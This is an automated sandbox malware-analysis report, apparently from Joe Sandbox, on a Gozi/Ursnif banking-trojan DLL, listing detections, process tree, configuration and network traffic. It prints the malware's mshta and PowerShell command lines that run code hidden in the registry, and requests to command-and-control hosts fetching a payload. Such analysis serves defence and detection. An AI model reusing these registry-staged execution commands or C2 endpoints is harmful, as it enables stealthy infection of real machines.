Play interactive tour

Edit tour

Analysis Report sup11_dump.dll

Overview

General Information

Sample Name:	sup11_dump.dll
Analysis ID:	344607
MD5:	92bcb08ab6be032cd4a64ac1292c2d16
SHA1:	dd1ee07155768a8d4b0cb1ec3fa666b5ac7e2eed
SHA256:	50ec326918e3930b8099b483ecf0a44bebba1fc7013cc234f2fbc358acb26fe5
Tags:	dll
Most interesting Screenshot:

Detection

Gozi Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected Gozi e-Banking trojan

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Dot net compiler compiles file from suspicious location

Yara detected Ursnif

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Hooks registry keys query functions (used to hide registry keys)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Suspicious Rundll32 Activity

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w10x64

loaddll32.exe (PID: 1892 cmdline: loaddll32.exe 'C:\Users\user\Desktop\sup11_dump.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)

regsvr32.exe (PID: 4496 cmdline: regsvr32.exe /s C:\Users\user\Desktop\sup11_dump.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

control.exe (PID: 5824 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

rundll32.exe (PID: 5312 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)

cmd.exe (PID: 5712 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

iexplore.exe (PID: 3104 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6160 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6504 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:82962 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6456 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5272 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:82978 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

mshta.exe (PID: 4220 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 6388 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 6220 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 5132 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES3C64.tmp' 'c:\Users\user\AppData\Local\Temp\oywbpzxb\CSC2DF1E538346248FC93F32E43C7FD9A69.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 6016 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 5856 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES4E84.tmp' 'c:\Users\user\AppData\Local\Temp\augdh01w\CSCB69F8509801B4EEB877EE395DFB169E8.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "162", "system": "8846c72aab592bf132e9340368599fe0hh", "size": "201280", "crc": "2", "action": "00000000", "id": "1100", "time": "1611719106", "user": "d095a5848695dc15e71ab15ce59a4257", "hash": "0x3cfb7f6d", "soft": "3"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000003.347644155.0000000005288000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.347681136.0000000005288000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.368377859.000000000510B000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000001.00000003.347573362.0000000005288000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.347619571.0000000005288000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.347469685.0000000005288000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.347515510.0000000005288000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.347664803.0000000005288000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.347704274.0000000005288000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: powershell.exe PID: 6388	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: regsvr32.exe PID: 4496	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 10 entries

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6388, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline', ProcessId: 6220

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4220, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 6388

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6388, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline', ProcessId: 6220

Sigma detected: Suspicious Rundll32 Activity

Show sources

Source: Process started

Author: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5824, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 5312

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: sup11_dump.dll

Avira: detected

Found malware configuration

Show sources

Source: regsvr32.exe.4496.1.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "162", "system": "8846c72aab592bf132e9340368599fe0hh", "size": "201280", "crc": "2", "action": "00000000", "id": "1100", "time": "1611719106", "user": "d095a5848695dc15e71ab15ce59a4257", "hash": "0x3cfb7f6d", "soft": "3"}

Multi AV Scanner detection for domain / URL

Show sources

Source: c56.lepini.at	Virustotal: Detection: 8%	Perma Link
Source: api3.lepini.at	Virustotal: Detection: 10%	Perma Link
Source: api10.laptok.at	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: sup11_dump.dll

Virustotal: Detection: 45%

Perma Link

Machine Learning detection for sample

Show sources

Source: sup11_dump.dll

Joe Sandbox ML: detected

Source: 1.2.regsvr32.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Show sources

Source: sup11_dump.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49740 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001F.00000002.419574555.000001D4F2870000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.428776969.0000026A53A00000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.439250329.0000000005B00000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.439250329.0000000005B00000.00000004.00000001.sdmp

Spreading:

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B7E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	1_2_02B7E0BA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B8888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_02B8888D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B94FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_02B94FE1

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_02B805EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

1_2_02B805EF

Networking:

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

Source: Joe Sandbox View

IP Address: 151.101.1.44 151.101.1.44

Source: Joe Sandbox View

ASN Name: SPECTRAIPSpectraIPBVNL SPECTRAIPSpectraIPBVNL

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic	HTTP traffic detected: GET /api1/fMoOyVtNHyb2CKT5h4Jv/cOtoUxpSs_2B7b6ktW6/8gKDvU8GZHurEn2nukEHAM/mBRpHfezDBeLc/1Val8ISr/ggV1pjQswOiZEbQ3ehKxHJY/mND7st4_2F/zvqzs_2F7uy_2Bb6o/3NqBL4_2BCgu/Eg0dWIbsiNp/OTltsytgATJROU/sIZwRhOMX71zuqhRMKIgV/JJtVE_2FgKvOcqIw/srgqU3CK_2FbRdx/IT_2FypXirSM9LJx6a/KaX7JOhW_/2F_2FH9Scf70TsmxARuA/FJ_2FEzlHBdy_2BM3Si/ebVcIeLFS9doIWImMnNuIk/8e9XWr3pdJVnY/Lc7jY8hP/_2BxFf2skUqywtS/A HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/zu_2FE7OgtG1YElZCJHzk/3Z6oZ2v_2FSvhdpl/3dtqOsJj6Y7KZxP/RohYJ_2FHTGS4WhMsK/QG5B0lq_2/BpfIpB91VJE6CEmZQm7M/PQN4vdDkebJ_2BGxKNI/VsKdR_2FzTa6vjFIkSkAZy/r8dnnf58olJ6u/p6WgAtg_/2FXj_2Baw19poatwg_2F2kO/3f5_2FyJS3/nBZ6Nmhf_2FEUX1qE/XHrQlN8gAX37/PR_2Fy_2B_2/BhmNEXvGPQ5mPx/Z35_2F9v0RKzbUs6X6gjG/o6gCLElU7pE_2Bpx/oRgBOdZRxgLD0_2/BNQ4L9i8wZtjCkBFgV/vbRDZhUKm/0qlCcD5z2Gyxth4kqVNJ/dA0aOC4 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/rFNKr2CGL/kXSQLJ4pLqCh1LXHR8pd/LghuFo_2Fz1_2Be9g4F/WXqLpHR1w1pWav92wE6yEv/uYPkaiYomq7al/rA1mR_2F/ERR1VtnRVC9Z9L97Yj0nEFv/RXcdmcZw3t/09S9mQ4TEGPoFg0wu/CB1TTO3K_2Fx/ES759oV_2F3/AqQYGPBuqK6lVx/HnWardAtMd40kxzRqiZ4c/ezlyaUtSbXNYPJd5/jFNmBUf7ol4D5iv/PAhhoqRwskHN_2BfyW/Qy04blpWl/1eFKv0iNVI2O85WUZxuE/12FPAo3Lux39x5EugSB/ZIqsnBNs_2B_2BTY3S2vKa/rTxfhO8bj/vDrid7bT/A HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/xN7Vn1nqjV06/Uoae0bry7tu/s480N1RigmgSZ7/ovhVgxM0v2lRZdUdmRPXr/2olZKjleSHMiCKnU/SGGkght_2BNMI_2/BdeG35GUXiZ0jGf3Nd/3Fyunz8gg/k2AMdUoBFgsyj_2BaOEu/BQnpHAOIwtJKSDTYnrI/w6kmi_2BgGuuwzJuTztW0W/4iuVF4d902ob0/E2PA6GSV/Sg1kbgn1io32otLr0SB6JL_/2BZcLfjHz0/pauFVWToc4OpmehUL/g9hTBcF9_2Fd/_2F0_2F2ETj/RAKC8_2FvCntWY/wuqDvU_2FGOflt850WrDr/FxIoV_2BeSB/Suhx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/9Dbk1WvXxj1sVm4yff/nk0pg4b0s/UVCKD_2BMZzstnnqhoFp/Ktn8x0OSRfno2WpW3u_/2FDol0BN3XO12yUJgBMYq6/iZh8WugGdwuvs/RKu1CLXP/1Z9vDFru5BWzbqKhcmT_2BM/Qv0FngLhqs/VDpS5UcoEsg1xls7_/2Bvy4JBL4QLN/K_2FtcmAOUK/sIfXs_2BO6Fp5q/oQH0xXcxqaH_2BOp0CawI/7aZdiKs11SUgIJU0/9Pv802DFLf2Wa7N/6q1aWSf7ymVrIOI4pW/il_2Fb_2F/JAX6Lfr2HK2GkQh4Lani/6J0JJGyWOdnxWHH/ueClpx2 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at

Source: de-ch[1].htm.4.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: msapplication.xml0.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbfe17e0a,0x01d6f45e</date><accdate>0xbfe17e0a,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbfe17e0a,0x01d6f45e</date><accdate>0xbfe17e0a,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbfe642ae,0x01d6f45e</date><accdate>0xbfe642ae,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbfe642ae,0x01d6f45e</date><accdate>0xbfe642ae,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbfe8a4f7,0x01d6f45e</date><accdate>0xbfe8a4f7,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbfe8a4f7,0x01d6f45e</date><accdate>0xbfe8a4f7,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.4.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
